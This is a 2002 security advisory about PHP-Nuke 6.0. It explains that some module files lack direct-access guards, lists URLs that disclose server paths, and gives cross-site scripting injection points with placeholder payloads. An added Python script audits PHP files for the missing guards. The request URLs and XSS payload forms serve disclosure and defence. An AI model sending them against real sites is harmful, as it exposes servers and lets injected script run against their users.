SECURITYVULNS:DOC:3884
Dec 17, 2002 - 12:00 a.m.

PHP-Nuke 6.0 : Path Disclosure & Cross Site Scripting

Information :
°°°°°°°°°°°°°
Product : PHP-Nuke
Version : 6.0
Website : http://www.phpnuke.org
Problems :

  • Path Disclosure
  • XSS

Development :
°°°°°°°°°°°°°
Most of PHP-Nuke's files are included by modules.php or index.php.
To prevent direct access to them, PHP-Nuke uses two kinds of guard.
The first one (e.g. in modules/Downloads/index.php) is :

if (!eregi("modules.php", $PHP_SELF)) {
die ("You can't access this file directly…");
}

The second one (e.g. in footer.php) :

if (eregi("footer.php",$PHP_SELF)) {
Header("Location: index.php");
die();
}

Some files lack these guards and contain security holes.
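
An added example (not part of the original advisory and not PHP-Nuke code): a Python audit that flags PHP files containing neither of the two guard forms quoted above, so that they can be reviewed for direct-access problems. The sample sources and file names are constructed, and the regexes assume the guards are written with eregi and $PHP_SELF as shown; a commented-out guard is not counted.

```python
import re
from pathlib import Path

_EREGI = r'eregi\s*\(\s*["\'][\w./-]+\.php["\']\s*,\s*\$PHP_SELF\s*\)'
_BODY_DIES = r'\s*\)\s*\{[^}]*\bdie\s*\('
# Form 1: if (!eregi("modules.php", $PHP_SELF)) { die(...); }
REQUIRE_ENTRY = re.compile(r'if\s*\(\s*!\s*' + _EREGI + _BODY_DIES, re.I)
# Form 2: if (eregi("footer.php", $PHP_SELF)) { Header(...); die(); }
REDIRECT_SELF = re.compile(r'if\s*\(\s*' + _EREGI + _BODY_DIES, re.I)
_BLOCK_COMMENT = re.compile(r'/\*.*?\*/', re.S)
_LINE_COMMENT = re.compile(r'^\s*(//|#).*$', re.M)

def guard_kind(source):
    """Return which guard form a PHP source contains, or None if it has neither."""
    # Drop block comments and whole-line comments so a disabled guard does not count.
    code = _LINE_COMMENT.sub('', _BLOCK_COMMENT.sub('', source))
    if REQUIRE_ENTRY.search(code):
        return 'require-entry-script'
    if REDIRECT_SELF.search(code):
        return 'redirect-when-direct'
    return None

def unguarded(sources):
    """sources: {relative path: PHP source}. Returns paths with no guard, sorted."""
    return sorted(p for p, src in sources.items() if guard_kind(src) is None)

def load_tree(root):
    """Read every .php file under root into the mapping unguarded() expects."""
    root = Path(root)
    return {str(f.relative_to(root)): f.read_text(errors='replace')
            for f in root.rglob('*.php')}

# Constructed sample sources (not real PHP-Nuke files); paths are placeholders.
SAMPLE = {
    'modules/A/index.php': '<?php\nif (!eregi("modules.php", $PHP_SELF)) {\n'
                           'die ("You can\'t access this file directly...");\n}\n',
    'footer.php': '<?php\nif (eregi("footer.php",$PHP_SELF)) {\n'
                  'Header("Location: index.php");\ndie();\n}\n',
    'modules/A/helper.php': '<?php\necho "<font face=\\"$site_font\\">";\n',
    'modules/A/old.php': '<?php\n// if (!eregi("modules.php", $PHP_SELF)) { die(); }\n'
                         'include("config.php");\n',
}

if __name__ == '__main__':
    for path in unguarded(SAMPLE):
        print('no direct-access guard:', path)
```

A file reported here is a candidate for review, not a confirmed hole; the entry scripts themselves (modules.php, index.php) are expected to appear in the output of unguarded(load_tree(...)).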

Exploits :
°°°°°°°°°°
Path Disclosure :
http://[target]/modules/Downloads/voteinclude.php
http://[target]/modules/Your_Account/navbar.php
http://[target]/modules/Forums/attachment.php
http://[target]/modules/Forums/auth.php
http://[target]/modules/News/comments.php
http://[target]/modules/Private_Messages/functions.php
http://[target]/modules/Private_Messages/index.php
http://[target]/modules/Private_Messages/read.php
http://[target]/modules/Private_Messages/reply.php
http://[target]/modules/Web_Links/voteinclude.php
http://[target]/modules/WebMail/contactbook.php?user=1

Path Disclosure & Cross Site Scripting :

  • http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT]
    or http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT]
    or
    http://[target]/modules/Forums/bb_smilies.php?site_font=}--></style>[SCRIPT]
    or http://[target]/modules/Forums/bb_smilies.php?bgcolor1=">[SCRIPT]
    or with :
    $sitename
    $table_width
    $color1
    $forumver

  • /modules/Forums/bbcode_ref.php with :
    $name
    $Default_Theme
    $site_font
    $sitename
    $bgcolor2
    $textcolor1
    $bgcolor1
    $forumver

  • /modules/Forums/editpost.php, /modules/Forums/newtopic.php,
    /modules/Forums/reply.php, /modules/Forums/topicadmin.php,
    /modules/Forums/viewforum.php with :
    $name

  • /modules/Forums/searchbb.php with :
    $name
    $bgcolor3
    $bgcolor1

Patch :
°°°°°°°
A patch can be found at http://www.phpsecure.org .

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/PHPNuke6.0.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHPNuke6.0.txt&langpair=fr%7Cen&hl=en&ie=ASCII&oe=ASCII

frog-m@n

